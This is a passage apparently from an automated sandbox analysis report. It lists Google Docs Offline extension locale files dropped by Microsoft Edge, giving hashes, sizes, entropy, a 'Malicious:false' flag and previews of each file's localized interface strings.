                                                                                                                                                                            SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                            MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                            SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                            SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                            SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                            Entropy (8bit):4.494568170878587
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1425
                                                                                                                                                                            Entropy (8bit):4.461560329690825
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):961
                                                                                                                                                                            Entropy (8bit):4.537633413451255
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):959
                                                                                                                                                                            Entropy (8bit):4.570019855018913
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):968
                                                                                                                                                                            Entropy (8bit):4.633956349931516
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):838
                                                                                                                                                                            Entropy (8bit):4.4975520913636595
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1305
                                                                                                                                                                            Entropy (8bit):4.673517697192589
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):911
                                                                                                                                                                            Entropy (8bit):4.6294343834070935
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):939
                                                                                                                                                                            Entropy (8bit):4.451724169062555
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                            Entropy (8bit):4.622066056638277
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):972
                                                                                                                                                                            Entropy (8bit):4.621319511196614
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):990
                                                                                                                                                                            Entropy (8bit):4.497202347098541
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1658
                                                                                                                                                                            Entropy (8bit):4.294833932445159
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1672
                                                                                                                                                                            Entropy (8bit):4.314484457325167
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):935
                                                                                                                                                                            Entropy (8bit):4.6369398601609735
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1065
                                                                                                                                                                            Entropy (8bit):4.816501737523951
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2771
                                                                                                                                                                            Entropy (8bit):3.7629875118570055
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):858
                                                                                                                                                                            Entropy (8bit):4.474411340525479
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):954
                                                                                                                                                                            Entropy (8bit):4.6457079159286545
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                            MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                            SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                            SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                            SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):899
                                                                                                                                                                            Entropy (8bit):4.474743599345443
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                            MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                            SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                            SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                            SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2230
                                                                                                                                                                            Entropy (8bit):3.8239097369647634
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                            MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                            SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                            SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                            SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1160
                                                                                                                                                                            Entropy (8bit):5.292894989863142
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                            MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                            SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                            SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                            SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3264
                                                                                                                                                                            Entropy (8bit):3.586016059431306
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                            MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                            SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                            SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                            SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3235
                                                                                                                                                                            Entropy (8bit):3.6081439490236464
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                            MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                            SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                            SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                            SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3122
                                                                                                                                                                            Entropy (8bit):3.891443295908904
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                            MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                            SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                            SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
